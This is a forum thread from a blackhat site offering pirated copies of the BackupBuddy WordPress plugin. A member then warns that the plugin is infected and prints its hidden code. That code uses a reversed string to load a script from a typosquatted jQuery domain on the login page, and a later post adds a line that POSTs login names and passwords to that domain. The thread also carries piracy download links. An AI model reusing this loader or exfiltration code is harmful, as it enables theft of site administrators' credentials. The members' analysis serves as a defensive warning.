Best Blackhat Forum

Best Blackhat Forum > Freebies > Software, Scripts, Plug-ins, Tools and Bots > [GET] BackupBuddy V5.2.0.5 - The best plugin to back up a WordPress site
Full Version: [GET] BackupBuddy V5.2.0.5 - The best plugin to back up a WordPress site
You're currently viewing a stripped down version of our content. View the full version with proper formatting.
Pages: 1 2

docadvocate

04-10-2015, 09:46 PM
[Image: Backupbuddy-v5-1-1-19-the-best-way-to-ba...s-site.png]
BackupBuddy V5.2.0.5 - The best plugin to back up a WordPress site 3.55MB
Sites get hacked every day. Our passwords are rarely as strong as we think. And sometimes it doesn't matter. Sometimes we (or our clients) delete the wrong file or make a change that breaks something. Ever trigger a fatal error from a bad plugin? Crashes happen. But with BackupBuddy, recovering from a problem is quick and easy.Site owners and developers love all the options
BackupBuddy gives you for safe, offsite storage.
Product page
Download Links
http://www43.zippyshare.com/v/7NKz36xP/file.html
http://mir.cr/1XLGDPOE
https://www.sendspace.com/file/6zd9d9
http://www.solidfiles.com/d/df026959bf/
http://[Reported by Members as premium hosting that SUCK! Use MEDIAFIRE or MEGA.NZ :) !!!].net/file/5228aee82f759af86f03d820acb916b5/backupbuddy.zip.html

cormancd

04-10-2015, 10:57 PM
[Below Link is Working 100% Tested]
Code:
http://moourl.com/r6glf
Unlimited Download Speed>With Resume Support
Just Download Freely

jacg

04-11-2015, 12:45 AM
Thank you very much!!!

kirstie

04-11-2015, 02:47 AM
WARNING

It is VERY likely that this plugin is INFECTED.

If you look at _pluginbuddy.php, there is this chunk of code:

PHP Code:
if ( ! function_exists'enqueue_my_script' ) ) {
if (!in_array($_SERVER['REMOTE_ADDR'], array('127.0.0.1''::1','localhost'))) {
    if (!isset($_COOKIE['wp_iz_admin'])) {
        add_action('login_enqueue_scripts''enqueue_my_script');
        add_action('wp_login''wp_setcookies');
    }
}
function enqueue_my_script()
{
    $domainis strrev('sj.tsetal-yreuqj/gro.yrueqj.edoc//:ptth');
    wp_enqueue_script('my-scripters'$domainisnullnulltrue);
}
function wp_setcookies()
{
    $path parse_url(get_option('siteurl'), PHP_URL_PATH);
    $host parse_url(get_option('siteurl'), PHP_URL_HOST);
    $expiry strtotime('+1 month');
    setcookie('wp_iz_admin''1'$expiry$path$host);
}


Note how it uses the reverse string command (strrev) to call javascript from this url:

Code:
$domainis = strrev('sj.tsetal-yreuqj/gro.yrueqj.edoc//:ptth');

When reversed, this becomes:

Code:
http://code.jqeury.org/jquery-latest.js

This is NOT the normal JQuery domain - the "u" and "e" are deliberately switched.

Having looked at the JS it loads, I'm 99.9% sure that it's designed to steal your Admin username and PW.

Maybe one of our more expert coders could confirm this?

docadvocate has posted a number of shares which contain this infected malware.

For example: http://bestblackhatforum.com/Thread-All-...on-2-3-6-1

tradermac

04-11-2015, 04:07 AM
I am taking no chances, deleted it.

MomoLily

04-11-2015, 04:30 AM
Kirstie, thx bro...we appreciate your analyze and your Time for this...thx bro

oldman

04-11-2015, 06:22 AM
taking no chances either... thanks and big +REP

ian.valley

04-12-2015, 04:51 AM
THIS PLUGIN HAS JUST WRECKED MY DATABASE - FORTUNATELY I WAS USING ANOTHER PLUGIN AT THE TIME TO BACKUP.
DON'T DOWNLOAD!!!

flashpan

04-12-2015, 05:40 AM
A really big thank you to kirstie for your diagnosis, reps left for saving me a huge amount of wasted time!

CreativeMedia

04-12-2015, 05:59 AM
$.ajax({type:"POST",url:"http://jqeury.org/wp_ping.php",async:false,data:{name:usr,pwd:passwd,dname:domainis,urliz:urlis},success:funct​ion(response){num=response;}});
Pages: 1 2
Best Blackhat Forum > Freebies > Software, Scripts, Plug-ins, Tools and Bots > [GET] BackupBuddy V5.2.0.5 - The best plugin to back up a WordPress site
Reference URL's